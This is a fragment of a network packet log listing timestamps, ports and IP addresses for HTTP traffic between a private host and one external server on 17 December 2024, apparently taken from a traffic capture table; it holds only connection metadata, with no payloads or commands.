Dec 17, 2024 06:03:40.415442944 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.415498018 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.415549994 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.415601015 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.416394949 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.416439056 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.416500092 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.416548014 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.417639017 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.417673111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.417686939 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.417720079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.418528080 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.418574095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.418649912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.418700933 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.419635057 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.419691086 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.419838905 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.419886112 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.420604944 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.420655966 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.420721054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.420762062 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.421710968 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.421757936 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.421818972 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.421864033 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.422755957 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.422808886 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.422869921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.422910929 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.423805952 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.423855066 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.423937082 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.423986912 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.424896955 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.424941063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.425008059 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.425050020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.426121950 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.426157951 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.426170111 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.426198959 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.427011967 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.427057028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.427122116 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.427170038 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.428062916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.428111076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.428177118 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.428217888 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.429141045 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.429186106 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.429217100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.429258108 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.430202961 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.430262089 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.430341959 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.430382013 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.431344986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.431391954 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.431401014 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.431442976 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.432394028 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.432456017 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.432523966 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.432574987 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.433363914 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.433413029 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.433494091 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.433542967 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.434530020 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.434566975 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.434582949 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.434611082 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.435517073 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.435563087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.435642958 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.435689926 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.436522007 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.436566114 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.436713934 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.436758995 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.437753916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.437791109 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.437803984 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.437836885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.438631058 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.438678026 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.438759089 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.438802958 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.439750910 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.439807892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.439851046 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.439894915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.440783978 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.440835953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.440916061 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.440959930 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.441869020 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.441920042 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.441984892 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.442029953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.442915916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.442970991 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.443017006 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.443063021 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.443964005 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.444015980 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.444081068 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.444127083 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.445053101 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.445099115 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.445107937 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.445147991 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.446116924 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.446161985 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.582413912 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.582477093 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.582562923 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.582674980 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.582729101 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.582871914 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.582923889 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.583817959 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.583862066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.583880901 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.583904028 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.584835052 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.584889889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.584943056 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.585985899 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.586019993 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.586038113 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.586064100 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.586987972 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.587022066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.587038994 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.587068081 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.588071108 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.588104963 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.588157892 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.589119911 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.589154959 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.589171886 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.589200020 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.590079069 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.590127945 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.590250969 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.590297937 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.591165066 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.591217995 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.591296911 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.591350079 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.592210054 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.592650890 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.592704058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.593346119 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.593379021 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.593396902 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.593425035 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.594367027 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.594399929 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.594414949 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.594439030 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.595403910 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.595447063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.595520973 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.595570087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.596415997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.596577883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.596623898 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.597496033 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.597548008 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.597604990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.597652912 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.598541021 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.598591089 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.598653078 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.598701000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.599628925 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.599684000 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.599742889 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.599792957 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.600718021 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.600891113 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.600940943 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.601739883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.601789951 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.601852894 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.601900101 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.602823973 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.602873087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.602933884 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.602982998 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.603876114 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.603979111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.604027033 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.604887962 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.604937077 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.605032921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.605078936 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.606066942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.606101990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.606153965 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.607033014 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.607215881 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.607273102 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.608078003 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.608243942 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.608298063 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.609163046 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.609213114 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.609263897 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.609314919 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.610317945 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.610368967 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.610444069 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.610487938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.611331940 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.611383915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.611452103 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.611500978 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.612409115 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.612525940 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.612580061 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.613467932 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.613503933 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.613518953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.613548040 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.614540100 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.614593029 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.614594936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.614645958 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.615531921 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.615591049 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.615631104 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.615685940 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.616569996 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.616796970 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.616847992 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.617738008 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.617772102 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.617788076 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.617811918 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.618805885 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.618839979 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.618855953 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.618884087 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.619760990 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.619812012 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.619882107 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.620816946 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.620866060 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.620929956 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.620986938 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.622159958 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.622195005 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.622221947 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.622243881 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.622987986 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.623141050 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.623193979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.624064922 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.624212027 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.624263048 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.625057936 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.625108004 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.625175953 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.625225067 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.626262903 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.626296997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.626318932 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.626333952 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.627298117 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.627347946 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.627348900 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.627392054 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.628380060 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.628413916 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.628458977 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.629507065 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.629542112 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.629556894 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.629584074 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.630506039 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.630541086 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.630554914 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.630580902 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.631422997 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.631473064 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.631659985 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.631710052 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.632520914 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.632755995 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.632807016 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.633655071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.633687973 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.633704901 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.633733034 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.634674072 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.634727955 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.634897947 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.634948015 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.635709047 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.635759115 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.635826111 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.636929989 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.636964083 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.636993885 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.637016058 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.637877941 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.639859915 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.800695896 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.800789118 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.800978899 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.801101923 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.801162004 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.801248074 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.801299095 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.802320957 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.802356005 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.802376032 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.802406073 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.803162098 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.803215027 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.803385973 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.803433895 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.804332972 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.804496050 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.804548979 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.804653883 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.804687023 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.804704905 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.804722071 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.804732084 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.804755926 CET	80	49902	31.41.244.11	192.168.2.5
Dec 17, 2024 06:03:40.804761887 CET	49902	80	192.168.2.5	31.41.244.11
Dec 17, 2024 06:03:40.804801941 CET	49902	80	192.168.2.5	31.41.244.11
